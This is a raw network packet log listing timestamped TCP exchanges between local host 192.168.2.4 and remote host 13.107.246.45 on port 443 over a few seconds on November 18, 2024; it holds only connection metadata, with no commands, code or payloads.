                                          Nov 18, 2024 23:44:48.305598021 CET4435731613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.306087017 CET57316443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.306092978 CET4435731613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.314851046 CET4435731513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.315258980 CET57315443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.315291882 CET4435731513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.315831900 CET57315443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.315843105 CET4435731513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.405586958 CET4435731313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.406018972 CET4435731313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.406111002 CET57313443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.406172991 CET57313443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.406213045 CET4435731313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.406244993 CET57313443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.406261921 CET4435731313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.409697056 CET57318443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.409739017 CET4435731813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.409838915 CET57318443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.410291910 CET57318443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.410311937 CET4435731813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.427786112 CET4435731413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.427853107 CET4435731413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.427942038 CET57314443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.428045034 CET57314443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.428045034 CET57314443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.428088903 CET4435731413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.428119898 CET4435731413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.430639029 CET57319443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.430727005 CET4435731913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.430803061 CET57319443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.430989981 CET57319443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.431015968 CET4435731913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.441333055 CET4435731613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.441488981 CET4435731613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.441550970 CET57316443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.441581964 CET57316443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.441597939 CET4435731613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.441608906 CET57316443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.441616058 CET4435731613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.444363117 CET57320443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.444389105 CET4435732013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.444462061 CET57320443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.444617987 CET57320443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.444631100 CET4435732013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.449538946 CET4435731513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.449675083 CET4435731513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.449740887 CET57315443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.449829102 CET57315443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.449848890 CET4435731513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.449872971 CET57315443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.449882984 CET4435731513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.452461004 CET57321443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.452487946 CET4435732113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.452553034 CET57321443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.452759981 CET57321443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.452775955 CET4435732113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.565766096 CET4435731713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.566395044 CET57317443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.566427946 CET4435731713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.567440987 CET57317443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.567447901 CET4435731713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.698137045 CET4435731713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.698311090 CET4435731713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.698375940 CET57317443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.698474884 CET57317443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.698499918 CET4435731713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.698517084 CET57317443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.698523998 CET4435731713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.701781988 CET57322443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.701800108 CET4435732213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.701864958 CET57322443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.702090025 CET57322443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.702095032 CET4435732213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.154159069 CET4435731813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.154727936 CET57318443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.154762030 CET4435731813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.155330896 CET57318443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.155339003 CET4435731813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.181488037 CET4435732013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.182080984 CET57320443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.182104111 CET4435732013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.183065891 CET57320443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.183072090 CET4435732013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.185647011 CET4435731913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.185942888 CET57319443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.185983896 CET4435731913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.186398029 CET57319443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.186403990 CET4435731913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.187684059 CET4435732113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.187958002 CET57321443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.187983036 CET4435732113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.188395977 CET57321443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.188401937 CET4435732113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.282571077 CET4435731813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.282716036 CET4435731813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.282840014 CET57318443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.284708023 CET57318443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.284738064 CET4435731813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.284750938 CET57318443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.284758091 CET4435731813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.288513899 CET57323443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.288598061 CET4435732313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.288712025 CET57323443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.288939953 CET57323443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.288966894 CET4435732313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.317224979 CET4435732113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.317370892 CET4435732113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.317451000 CET57321443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.317621946 CET57321443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.317648888 CET4435732113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.317662954 CET57321443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.317670107 CET4435732113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.319281101 CET4435731913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.319525003 CET4435731913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.319814920 CET57319443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.319814920 CET57319443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.319814920 CET57319443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.320789099 CET57324443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.320822001 CET4435732413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.320933104 CET57324443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.321115971 CET57324443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.321130991 CET4435732413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.322451115 CET57325443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.322529078 CET4435732513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.322818995 CET57325443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.322969913 CET57325443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.323008060 CET4435732513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.372098923 CET4435732013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.372385025 CET4435732013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.372565985 CET57320443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.372565985 CET57320443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.372565985 CET57320443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.375191927 CET57326443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.375230074 CET4435732613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.375324965 CET57326443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.375471115 CET57326443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.375488997 CET4435732613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.454364061 CET4435732213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.454881907 CET57322443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.454900980 CET4435732213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.455483913 CET57322443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.455490112 CET4435732213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.581579924 CET4435732213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.581861019 CET4435732213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.582021952 CET57322443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.582021952 CET57322443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.582021952 CET57322443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.584764004 CET57327443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.584868908 CET4435732713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.584954977 CET57327443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.585117102 CET57327443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.585139990 CET4435732713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.628571033 CET57319443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.628652096 CET4435731913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.675530910 CET57320443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.675560951 CET4435732013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:49.894330025 CET57322443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:49.894351006 CET4435732213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.058208942 CET4435732313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.059473038 CET57323443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.059504032 CET4435732313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.059881926 CET57323443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.059887886 CET4435732313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.067959070 CET4435732413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.068368912 CET57324443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.068396091 CET4435732413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.068882942 CET57324443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.068888903 CET4435732413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.076215029 CET4435732513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.076497078 CET57325443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.076535940 CET4435732513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.076966047 CET57325443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.076977968 CET4435732513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.111766100 CET4435732613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.112282038 CET57326443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.112293959 CET4435732613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.112808943 CET57326443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.112816095 CET4435732613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.196206093 CET4435732313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.196789026 CET4435732313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.196854115 CET57323443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.196902990 CET57323443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.196902990 CET57323443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.196924925 CET4435732313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.196937084 CET4435732313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.199873924 CET57329443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.199906111 CET4435732913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.200002909 CET57329443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.200146914 CET57329443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.200155973 CET4435732913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.200830936 CET4435732413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.201030016 CET4435732413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.201167107 CET57324443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.201167107 CET57324443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.201167107 CET57324443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.203388929 CET57330443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.203413963 CET4435733013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.203480005 CET57330443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.203599930 CET57330443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.203619003 CET4435733013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.208560944 CET4435732513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.208713055 CET4435732513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.208785057 CET57325443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.208863020 CET57325443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.208863020 CET57325443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.208906889 CET4435732513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.208930969 CET4435732513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.211210966 CET57331443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.211237907 CET4435733113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.211319923 CET57331443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.211457968 CET57331443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.211464882 CET4435733113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.241261005 CET4435732613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.241482973 CET4435732613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.241543055 CET57326443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.241580963 CET57326443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.241580963 CET57326443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.241600037 CET4435732613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.241612911 CET4435732613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.243712902 CET57332443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.243768930 CET4435733213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.243855953 CET57332443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.243979931 CET57332443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.243998051 CET4435733213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.321975946 CET4435732713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.322432041 CET57327443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.322464943 CET4435732713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.322841883 CET57327443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.322849989 CET4435732713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.456401110 CET4435732713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.456566095 CET4435732713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.456675053 CET57327443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.456749916 CET57327443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.456788063 CET4435732713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.456815004 CET57327443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.456830025 CET4435732713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.459445953 CET57333443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.459484100 CET4435733313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.459564924 CET57333443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.459748030 CET57333443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.459763050 CET4435733313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.503557920 CET57324443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.503576994 CET4435732413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.937412977 CET4435733013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.938230038 CET57330443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.938251972 CET4435733013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.938668966 CET57330443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.938673019 CET4435733013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.946093082 CET4435733113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.946793079 CET57331443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.946820974 CET4435733113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.946851969 CET57331443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.946858883 CET4435733113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.947788954 CET4435732913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.948307991 CET57329443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.948347092 CET4435732913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.948591948 CET57329443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.948600054 CET4435732913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.978564024 CET4435733213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.979083061 CET57332443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.979160070 CET4435733213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:50.979675055 CET57332443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:50.979688883 CET4435733213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.074744940 CET4435733013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.075001001 CET4435733013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.075069904 CET57330443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.075109959 CET57330443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.075128078 CET4435733013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.075139046 CET57330443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.075144053 CET4435733013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.077920914 CET57334443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.077994108 CET4435733413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.078079939 CET57334443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.078274012 CET57334443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.078309059 CET4435733413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.079310894 CET4435732913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.079531908 CET4435732913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.079691887 CET57329443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.079691887 CET57329443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.079691887 CET57329443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.081809998 CET57335443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.081847906 CET4435733513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.082019091 CET57335443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.082142115 CET57335443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.082165956 CET4435733513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.083937883 CET4435733113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.084155083 CET4435733113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.084218979 CET57331443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.084259987 CET57331443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.084280968 CET4435733113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.084295034 CET57331443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.084301949 CET4435733113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.086464882 CET57336443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.086563110 CET4435733613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.086642027 CET57336443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.086805105 CET57336443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.086842060 CET4435733613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.106091976 CET4435733213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.106277943 CET4435733213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.106513023 CET57332443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.106580973 CET57332443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.106609106 CET4435733213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.106632948 CET57332443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.106647015 CET4435733213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.108835936 CET57337443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.108921051 CET4435733713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.109040022 CET57337443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.109219074 CET57337443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.109256983 CET4435733713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.195923090 CET4435733313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.196505070 CET57333443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.196533918 CET4435733313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.196822882 CET57333443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.196830988 CET4435733313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.394546986 CET57329443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.394567966 CET4435732913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.539757967 CET4435733313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.539932966 CET4435733313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.539990902 CET57333443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.540035009 CET57333443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.540054083 CET4435733313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.540067911 CET57333443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.540075064 CET4435733313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.543258905 CET57338443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.543335915 CET4435733813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.543423891 CET57338443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.543551922 CET57338443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.543569088 CET4435733813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.802640915 CET4435733413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.803183079 CET57334443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.803236008 CET4435733413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.803956985 CET57334443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.803970098 CET4435733413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.835622072 CET4435733513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.835995913 CET57335443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.836014986 CET4435733513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.836602926 CET57335443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.836611032 CET4435733513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.840619087 CET4435733613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.841065884 CET57336443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.841099977 CET4435733613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.841731071 CET57336443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.841746092 CET4435733613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.852600098 CET4435733713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.853034019 CET57337443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.853065968 CET4435733713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.853593111 CET57337443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.853609085 CET4435733713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.931459904 CET4435733413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.931525946 CET4435733413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.931654930 CET57334443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.931793928 CET57334443192.168.2.413.107.246.45
